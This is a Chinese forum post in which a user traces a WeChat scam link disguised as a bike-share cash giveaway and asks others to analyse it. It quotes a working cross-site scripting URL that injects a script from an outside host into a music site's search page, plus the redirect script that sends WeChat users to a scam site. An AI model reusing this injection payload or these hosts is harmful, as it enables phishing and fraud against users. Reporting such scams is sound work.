前排提示:其实只有最后面给的那个网址有用,中间都是过渡,讲故事用的。想搞事情的可以直接搞最后面的。
下午看到有人发了个「小黄车全民惊喜袭来,我刚刚拿到了¥ xxx !」,感觉有点像诈骗类的链接,点进去一看,没啥问题,而且红包跳出的方式跟微信的一样。但是选择用浏览器打开时,网址就暴露了。网址如下: http://my.yue365.com/search/index.shtml?KeyWords=%3Cscript%20src%3D%27http%3A%2F%2Fttqwe.applinzi.com%2Fj.php%27%3E%3C%2Fscript%3E&type=song&skt=58451491983841
然后又接着访问这个网址: http://ttqwe.applinzi.com/j.php
然后整个网页出来了一句这个:
var ua = navigator.userAgent;if(ua.indexOf("MicroMessenger")>0){window.location.href = "http://erng1191906168168v2g.chinacloudsites.cn/";}
接着我又打开了这个网址: http://erng1191906168168v2g.chinacloudsites.cn/
上面这个网址其实就是真正的诈骗网站了。
源代码里有这么个网站: http://ceshice123.chinacloudapp.cn/gift/v2/jssdk/azure/index.js
貌似是让我先分享给三个群,然后再分享到朋友圈,集满三个赞, 4 月 20 日钱就到账了。。。感觉到时候可能要套用户的个人隐私或者骗钱? 由于我不是 IT 人员,看不懂上面写的啥,有没有人给分析分析?